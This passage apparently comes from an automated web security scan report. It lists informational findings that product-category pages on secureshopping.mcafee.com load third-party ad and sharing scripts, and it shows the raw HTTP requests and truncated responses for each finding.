<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Input Devices at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.142. http://secureshopping.mcafee.com/browse/computers/input-devices/joysticks-gamepads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/joysticks-gamepads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/input-devices/joysticks-gamepads/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:50 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:50 GMT
Content-Length: 18450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Joysticks & Gamepads at McAfee Secure Shopping - Search, Dis
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.143. http://secureshopping.mcafee.com/browse/computers/input-devices/keyboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/keyboards/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/input-devices/keyboards/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:50 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:50 GMT
Content-Length: 60368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Keyboards at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.144. http://secureshopping.mcafee.com/browse/computers/input-devices/mice/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/mice/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/input-devices/mice/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:51 GMT
Content-Length: 50625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Mice at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.145. http://secureshopping.mcafee.com/browse/computers/monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/monitors/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/monitors/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:52 GMT
Content-Length: 55334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Monitors at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.146. http://secureshopping.mcafee.com/browse/computers/network-communications/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/network-communications/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:54 GMT
Content-Length: 61132

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Network & Communications at McAfee Secure Shopping - Search,
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.147. http://secureshopping.mcafee.com/browse/computers/network-communications/adapters-interfaces/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/adapters-interfaces/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/network-communications/adapters-interfaces/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:55 GMT
Content-Length: 50155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Adapters & Interfaces at McAfee Secure Shopping - Search, Di
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.148. http://secureshopping.mcafee.com/browse/computers/network-communications/bridges,-routers,-gateways/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/bridges,-routers,-gateways/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/network-communications/bridges,-routers,-gateways/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:56 GMT
Content-Length: 62646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bridges, Routers, Gateways at McAfee Secure Shopping - Search, D
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.149. http://secureshopping.mcafee.com/browse/computers/network-communications/modems/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/modems/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/network-communications/modems/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:58 GMT
Content-Length: 56763

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Modems at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.150. http://secureshopping.mcafee.com/browse/computers/network-communications/network-hubs-switches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/network-hubs-switches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/network-communications/network-hubs-switches/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:58 GMT
Content-Length: 54531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Network Hubs & Switches at McAfee Secure Shopping - Search,
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.151. http://secureshopping.mcafee.com/browse/computers/servers/terminals-thin-clients/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/servers/terminals-thin-clients/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/servers/terminals-thin-clients/ HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/computers/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
